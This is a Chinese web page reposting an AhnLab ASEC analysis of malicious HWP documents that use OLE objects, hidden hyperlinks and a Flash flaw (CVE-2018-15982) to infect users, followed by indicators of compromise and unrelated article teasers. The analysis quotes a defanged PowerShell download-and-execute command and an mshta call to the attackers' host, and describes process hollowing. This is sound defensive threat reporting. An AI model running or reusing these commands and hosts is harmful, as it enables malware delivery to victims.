当前位置：首页 > news >正文

利用 OLE 对象漏洞的 HWP 恶意文件浮出水面

news 2025/11/6 8:06:21

ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件，尽管其使用了 2020 年就被识别的恶意 URL，但仍然使用了 Flash
漏洞（CVE-2018-15982），需要用户谨慎对待。

打开 HWP 文件时会在 %TEMP%文件夹中生成如下文件。攻击者不直接使用 powershell.exe 和 mshta.exe
可能是为了要规避检测。

image.png-100.7kB 插入文档的
OLE 对象

image.png-63.4kB 文件信息

从文件内容来看，文件中带有个人资料表格等标题。与过去类似，攻击者在每个格中通过空格与超链接来执行恶意文件。

image.png-101.2kB 嵌入超链接

image.png-82.3kB 超链接详情

当用户单击字段填写表格时，就会执行嵌入的超链接。超链接以相对路径构建，因此 HWP 文件必须处在特定的位置才能触发恶意行为。

通过 mshta.exe 来连接恶意 URL（%tmp%\hwp.exe “hxxp://yukkimmo.sportsontheweb[.]net/hw.php”）。

可以根据攻击者的意图来执行各种恶意命令：

image.png-188.8kB 传输的命令

另一个值得一提的恶意命令是：hword.exe -nop -c \”iex(new-object net.webclient).downloadstring('hxxp://yukkimmo.sportsontheweb[.]net/h.txt')。

image.png-173.4kB 脚本代码

脚本具备两项功能：* 通过 hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt下载其他 PE 文件，保存在 %temp% 文件夹中并通过 Process Hollowing 执行。

image.png-30.5kB 进程树* 生成的文件 1234dd.tmp被重命名为 3dd21.tmp。当用户再次打开 HWP 文件时，会自动打开嵌入了 Flash 对象的 HWP 文件（1234dd.tmp），该文件与前述提到的文件也是类似的。

image.png-108.3kB 文件信息

后续的 HWP 文件包含一个 Flash 对象，其中嵌入了某个 URL。

image.png-126.2kB 嵌入
Flash 对象

image.png-234.2kB 对象属性

该 URL（hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php）早在 2020
年就被检测为恶意。

另一个 HWP 文件，伪装成用于支付服务费的个人数据收集表格。其中也嵌入了 OLE 对象，执行的文件基本类似。

image.png-121.9kB 识别额外的
HWP 文件

image.png-110.6kB 文件信息

表格中依旧嵌入了超链接，用户单击时就会触发 LNK
文件执行命令（hxxp://yukkimmo.sportsontheweb[.]net/hw.php），与前述文章类似。

IOC

76f8ccf8313af617df28e8e1f7f39f73> 9a13173df687549cfce3b36d8a4e20d3> 804d12b116bb40282fbf245db885c093> caa923803152dd9e6b5bf7f6b816ae98> 2f4ed70149da3825be16b6057bf7b8df> 65993d1cb0d1d7ce218fb267ee36f7c1> 330f2f1eb6dc3d753b756a27694ef89b> hxxp://yukkimmo.sportsontheweb.net/hw.php> hxxp://yukkimmo. sportsontheweb[.]net/h.txt> hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt> hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php

参考来源

AhnLab

.php

参考来源

AhnLab

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话，可以在文末下载（无偿的），大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程：

上述资料【扫下方二维码】就可以领取了，无偿分享

利用 OLE 对象漏洞的 HWP 恶意文件浮出水面

ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件，尽管其使用了 2020 年就被识别的恶意 URL，但仍然使用了 Flash 漏洞（CVE-2018-15982），需要用户谨慎对待。打开 HWP 文件时会在 %TEMP%文件夹中生成如下文件。攻…...

编程日记 2023/8/10 4:18:01

【CSS】倾斜按钮

效果 index.html <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"/><meta http-equiv"X-UA-Compatible" content"IEedge"/><meta name"viewport" content"widthdevice-…...

编程日记 2023/8/10 4:17:00

js 正则表达式

js 正则表达式 http://tool.oschina.net/regex https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Guide/Regular_Expressions 11 22...

编程日记 2023/8/10 4:15:58

心理咨询预约管理系统javaweb医院挂号jsp源代码mysql

本项目为前几天收费帮学妹做的一个项目，Java EE JSP项目，在工作环境中基本使用不到，但是很多学校把这个当作编程入门的项目来做，故分享出本项目供初学者参考。一、项目描述心理咨询预约管理系统javaweb MVC模式，普…...

编程日记 2023/8/10 4:14:56

Linux中安装Node

安装先从官方网站下载安装包，有时 node 版本太新会导致失败，详见下方的常见问题第2点 cd /home // 创建目录，将下载好的 node 安装包上传到此目录 mkdir Download mkdir /usr/local/lib/node解压 // 解压，前面是文件当前路径…...

编程日记 2023/8/10 4:13:55

爬虫011_元组高级操作_以及字符串的切片操作---python工作笔记030

获取元组的下标对应的值注意元组是不可以修改值的,只能获取不能修改但是列表是可以修改值的对吧...

编程日记 2023/8/10 4:12:54

JVM虚拟机篇

JVM组成面试题1：什么是程序计数器？ 面试题2：你能给我详细的介绍Java堆吗? 面试题3：什么是虚拟机栈？ 面试题4：垃圾回收是否涉及栈内存？ 垃圾回收主要指就是堆内存，当栈帧弹栈以后…...

编程日记 2023/8/10 4:11:53

Flutter 让软键盘不再自动弹起

1、问题说明： 在开发中，经常遇到这种事，一个页面有输入框，点击输入框后，会弹起软键盘，同时输入框会聚焦，手动收起软键盘后，点击另一个按钮前往下一个页面或者显示一个弹窗&#xff0…...

编程日记 2023/8/10 4:10:51

k8s 自身原理 1

咱们从 pod 一直分享到最近的 Statefulset 资源，到现在好像我们只是知道如何使用 k8s，如何按照 k8s 设计好的规则去应用，去玩 k8s 仔细想想，对于 k8s 自身的内在原理，我们好像还不是很清楚，对于每一个资源…...

编程日记 2023/8/10 4:09:48

在CPU上安装部署chatglm-6b实用经验分享

chatglm-6b很强，很多同学都想自己试一试，但不是每个人都有GPU、高端显卡的环境，大多数同学都是一台普通的笔记本。笔者这里分享一下在自己的8G内存，intel i3笔记本上安装部署chatglm-6b的实际经验。有很多网站都分享了一些经验&…...

编程日记 2023/8/10 4:08:47

Mermaid系列之FlowChart流程图

一.欢迎来到我的酒馆介绍mermaid下，Flowchat流程图语法。目录一.欢迎来到我的酒馆二.什么是mermiad工具三.在vs code中使用mermaid四.基本语法二.什么是mermiad工具 2.1 mermaid可以让你使用代码来创建图表和可视化效果。mermaid是一款基于javascript语言的图表…...

编程日记 2023/8/10 4:07:46

分享Java技术下AutojsPro7云控代码

引言有图有真相，那短视频就更是真相了。下面是三大语言的短视频。 Java源码版云控示例： Java源码版云控示例在线视频核心技术：各个编程语言的WebSocket技术。 Java：Nettey、Net：Fleck、Python：Tornad…...

编程日记 2023/8/10 4:06:45

黑马机器学习day2

1.1sklearn转换器和估计器转换器和预估器（estimator） 1.1.1转换器实例化一个转换器类 Transformer调用fit_transform() 转换器调用有以下几种形式： fit_transformfittransform 1.1.2估计器在sklearn中，估计器是一…...

编程日记 2023/8/10 4:05:43

rosdep init || rosdep update || 出错？链接失败？换源！

问题简述本文主要解决rosdep init失败，rosdep update失败的问题。 rosdep init失败和rosdep update失败，最常见的问题就是网络链接失败。有的朋友会说“诶我使用了tz啊”，但是这里的链接失败对time out的要求不低，虽然你使用了…...

编程日记 2023/8/10 4:04:42

流量、日志分析分析

这周主要以做题为主先找找理论看然后在buuctrf以及nssctf找了题做了解wireshark Wireshark是一款开源的网络协议分析软件，具有录制和检查网络数据包的功能，可以深入了解网络通信中的传输协议、数据格式以及通信行为。Wireshark可以捕获发送和接收的数…...

编程日记 2023/8/10 4:03:41

签名 func (a *Account) Sign(message []byte) ([]byte, error) {hash : crypto.Keccak256Hash(message)signature, err : crypto.Sign(hash.Bytes(), a.privateKeyECDSA)if err ! nil {log.Fatal(err)}signMsg : []byte(hexutil.Encode(signature))return signMsg, err }验签…...

编程日记 2023/8/10 4:02:40

利用 OLE 对象漏洞的 HWP 恶意文件浮出水面

IOC

参考来源

参考来源

网络安全工程师企业级学习路线

相关文章：

利用 OLE 对象漏洞的 HWP 恶意文件浮出水面

【CSS】倾斜按钮

js 正则表达式

心理咨询预约管理系统javaweb医院挂号jsp源代码mysql

Linux中安装Node

爬虫011_元组高级操作_以及字符串的切片操作---python工作笔记030

JVM虚拟机篇

Flutter 让软键盘不再自动弹起

k8s 自身原理 1

在CPU上安装部署chatglm-6b实用经验分享

Mermaid系列之FlowChart流程图

分享Java技术下AutojsPro7云控代码

黑马机器学习day2

rosdep init || rosdep update || 出错？链接失败？换源！

流量、日志分析分析

Go学习第八天

算法练习--数值相关

RobotFramework的安装过程及应用举例

WebGL系列教程：WebGL基础知识

数据的逻辑结构和存储结构

基于算法竞赛的c++编程（28）结构体的进阶应用

19c补丁后oracle属主变化，导致不能识别磁盘组

Appium+python自动化（十六）- ADB命令

练习（含atoi的模拟实现,自定义类型等练习）

浅谈不同二分算法的查找情况

安卓基础（aar）

服务器--宝塔命令

Python ROS2【机器人中间件框架】简介

数据挖掘是什么？数据挖掘技术有哪些？

用 FFmpeg 实现 RTMP 推流直播